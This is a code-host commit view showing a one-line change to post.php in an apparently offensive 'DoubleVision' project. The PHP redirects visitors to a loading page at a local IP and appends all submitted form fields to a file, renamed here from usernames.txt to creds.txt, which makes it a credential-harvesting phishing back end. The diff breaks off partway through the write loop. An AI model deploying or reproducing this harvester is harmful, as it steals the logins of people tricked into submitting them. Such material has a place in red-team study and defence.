浏览代码

Update post.php

assume-breach 3 年之前
父节点
当前提交
ed84ed2e9c
共有 1 个文件被更改,包括 1 次插入1 次删除
  1. 1 1
      DoubleVision/html/post.php

+ 1 - 1
DoubleVision/html/post.php

@@ -1,6 +1,6 @@
 <?php
 header ('Location:http://10.1.1.1/loading.html');
-$handle = fopen("usernames.txt", "a");
+$handle = fopen("creds.txt", "a");
 foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");